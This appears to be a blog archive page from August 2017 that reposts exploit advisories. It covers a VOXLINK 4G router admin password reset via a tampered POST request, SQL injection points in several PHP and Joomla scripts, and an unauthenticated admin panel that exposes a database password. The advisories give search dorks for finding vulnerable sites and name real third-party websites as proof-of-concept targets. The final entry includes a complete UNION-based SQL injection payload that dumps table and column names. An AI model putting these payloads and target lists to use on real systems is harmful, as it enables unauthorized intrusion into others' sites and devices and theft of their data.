Showing posts from August 2017

VOXLINK Unlocked 4G LTE admin Password Reset

# Exploit Title: VOXLINK Unlocked 4G LTE admin Password Reset
# Author: SellerPwnd
# Date: [2017-03-13]
# Tested on: Windows 7
# Product Vendor: http://www.voxlink.com.cn
###########################################################################################

Changing the password is very easy.

Go to:

http://192.168.199.1/cgi-bin/set_sys_basic.cgi

Tamper with the request and add this POST data:

ipt_new_pass=admin

Now you can log in with the password admin.

Victor Muller v 2014 & 2015 sql injection vulnerability

========================================================================
| # Title     : Victor Muller v 2014 & 2015 sql injection vulnerability
| # Author    : Cyclo'sTextovert
| # email     : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version   : v 2014 & 2015
| # Vendor    : maniacscientist@gmail.com
| # Dork      : "Victor Muller © 2015"   shows.php?id=
========================================================================

poc :

http://www.tessa.lv/shows.php?id=125 (inject here)

admin panel :

http://www.tessa.lv/admin/

CH Radyo v.2 php script SQL injection vulnerability

========================================================================
| # Title     : CH Radyo v.2 php script SQL injection vulnerability
| # Author    : Cyclo'sTextovert
| # email     : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version   : v.2
| # Vendor    : http://www.scripti.org/script_ch-radyo-scripti_3292_27.html
| # Dork      : "index.html?soru="
========================================================================

poc :

http://www.kissradyo.com/index.html?soru=15 (inject here)

BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability

========================================================================
| # Title     : BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability
| # Author    : Cyclo'sTextovert
| # email     : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version   : v3.0
| # Vendor    : http://wmscripti.com/php-scriptler/bozukradyo-v3-radyo-scripti.html
| # Dork      : n/a
========================================================================

poc :

Choose a target and add the payload "panel/ayarlar.php"

1 - http://hitmusic.gen.tr/panel/ayarlar.php

2 - Open the page source; the encrypted database password is found at line 121

Bloly version 1.3 SQL injection vulnerability

========================================================================
| # Title     : Bloly version 1.3 SQL injection vulnerability
| # Author    : Cyclo'sTextovert
| # email     : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version   : 1.3
| # Vendor    : http://www.bloly.com/download.php
| # Dork      : "Bloly v1.3 by SoftCab Inc"
========================================================================

poc :

http://pcswebsites.com/search.php?page=%5c&q=1 (inject here)

Automagick Tube Script version 1.4.4 Application

========================================================================
| # Title     : Automagick Tube Script version 1.4.4 Application error message vulnerability
| # Author    : Cyclo'sTextovert
| # email     : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version   : 1.4.4
| # Vendor    : http://automagick.com/
| # Dork      : .:: © Copyright 2008-2013 - Automagick Tube Script - All Rights Reserved ::.
========================================================================

poc :

choose a target and add "index.php?module=videos&tag[]=Search"

http://www.xxxsexvideos.tv/index.php?module=videos&tag[]=Search

Joomla! Component SIMGenealogy v2.1.5 - SQL Injection

# # # # #
#
# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
#
# Dork: N/A
#
# Date: 02.08.2017
#
# Vendor : https://www.simbunch.com/
# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
#
# Demo: https://www.simbunch.com/demos/simgenealogy
#
# Version: 2.1.5
# # # # #
#
# # #
# Author: Cyclo'sTextovert
#
# # # #
# #
# # SQL Injection/Exploit :
#
# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL] # Etc..
#
# # # # #

Joomla PHP-Bridge 1.2.3 SQL Injection

# # # # #
#
# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
#
# Dork: N/A
#
# Date: 02.08.2017
#
# Vendor : http://www.henryschorradt.de/
# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
#
# Demo: http://www.henryschorradt.de/joomla-php-bridge/
#
# Version: 1.2.3
# # # # #
#
# Author: Cyclo'sTextovert
#
# # # # #
#
# SQL Injection/Exploit :
#
# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
#
# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
#
# Etc..
#
# # # # #